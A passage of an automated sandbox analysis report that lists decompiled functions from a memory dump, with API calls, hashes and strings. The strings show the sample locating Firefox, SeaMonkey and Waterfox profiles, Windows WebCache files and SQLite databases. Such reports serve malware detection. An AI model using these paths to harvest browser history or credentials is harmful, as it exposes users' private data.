                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                  • memset.MSVCRT ref: 00403DDA
                                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                  • String ID: Waterfox$Waterfox\Profiles
                                                                                                                  • API String ID: 4039892925-11920434
                                                                                                                  • Opcode ID: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                                                                  • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                  • Opcode Fuzzy Hash: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                                                                  • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                  Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00403E50
                                                                                                                  • memset.MSVCRT ref: 00403E65
                                                                                                                  • memset.MSVCRT ref: 00403E7A
                                                                                                                  • memset.MSVCRT ref: 00403E8F
                                                                                                                  • memset.MSVCRT ref: 00403EA4
                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                  • memset.MSVCRT ref: 00403F6B
                                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                  • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                  • API String ID: 4039892925-2068335096
                                                                                                                  • Opcode ID: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                                                                  • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                  • Opcode Fuzzy Hash: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                                                                  • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                  Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00403FE1
                                                                                                                  • memset.MSVCRT ref: 00403FF6
                                                                                                                  • memset.MSVCRT ref: 0040400B
                                                                                                                  • memset.MSVCRT ref: 00404020
                                                                                                                  • memset.MSVCRT ref: 00404035
                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                  • memset.MSVCRT ref: 004040FC
                                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                  • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                  • API String ID: 4039892925-3369679110
                                                                                                                  • Opcode ID: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                                                                  • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                  • Opcode Fuzzy Hash: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                                                                  • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                  Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy
                                                                                                                  • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                  • API String ID: 3510742995-2641926074
                                                                                                                  • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                  • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                  • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                  • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                  Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                    • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                    • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                  • memset.MSVCRT ref: 004033B7
                                                                                                                  • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                  • wcscmp.MSVCRT ref: 004033FC
                                                                                                                  • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                  • String ID: $0.@
                                                                                                                  • API String ID: 2758756878-1896041820
                                                                                                                  • Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                                  • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                  • Opcode Fuzzy Hash: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                                  • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                  Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2941347001-0
                                                                                                                  • Opcode ID: 42456554a4125e12c9760a290a1ae7f8766add3746ffa376f76814c589a7dd26
                                                                                                                  • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                                  • Opcode Fuzzy Hash: 42456554a4125e12c9760a290a1ae7f8766add3746ffa376f76814c589a7dd26
                                                                                                                  • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                                  Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00403C09
                                                                                                                  • memset.MSVCRT ref: 00403C1E
                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                    • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                    • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                  • wcscat.MSVCRT ref: 00403C47
                                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                  • wcscat.MSVCRT ref: 00403C70
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                                                  • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                  • API String ID: 1534475566-1174173950
                                                                                                                  • Opcode ID: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                                                  • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                  • Opcode Fuzzy Hash: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                                                  • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                  Function 00414C2E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77registryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                  • memset.MSVCRT ref: 00414C87
                                                                                                                  • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                  • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                    • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                  Strings
                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                  • API String ID: 71295984-2036018995
                                                                                                                  • Opcode ID: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                                                  • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                  • Opcode Fuzzy Hash: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                                                  • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                  Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • wcschr.MSVCRT ref: 00414458
                                                                                                                  • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                  • String ID: "%s"
                                                                                                                  • API String ID: 1343145685-3297466227
                                                                                                                  • Opcode ID: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                                  • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                  • Opcode Fuzzy Hash: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                                  • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                  Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                                  • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                  • String ID: GetProcessTimes$kernel32.dll
                                                                                                                  • API String ID: 1714573020-3385500049
                                                                                                                  • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                  • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                  • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                  • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                  Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004087D6
                                                                                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                    • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                  • memset.MSVCRT ref: 00408828
                                                                                                                  • memset.MSVCRT ref: 00408840
                                                                                                                  • memset.MSVCRT ref: 00408858
                                                                                                                  • memset.MSVCRT ref: 00408870
                                                                                                                  • memset.MSVCRT ref: 00408888
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2911713577-0
                                                                                                                  • Opcode ID: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                                                  • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                  • Opcode Fuzzy Hash: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                                                  • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                  Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                                  • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                                  • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcmp
                                                                                                                  • String ID: @ $SQLite format 3
                                                                                                                  • API String ID: 1475443563-3708268960
                                                                                                                  • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                  • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                  • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                  • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                  Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcsicmpqsort
                                                                                                                  • String ID: /nosort$/sort
                                                                                                                  • API String ID: 1579243037-1578091866
                                                                                                                  • Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                                  • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                  • Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                                  • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                  Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040E60F
                                                                                                                  • memset.MSVCRT ref: 0040E629
                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                  Strings
                                                                                                                  • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                  • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                                                  • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                  • API String ID: 2887208581-2114579845
                                                                                                                  • Opcode ID: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                                                  • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                  • Opcode Fuzzy Hash: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                                                  • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                  Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
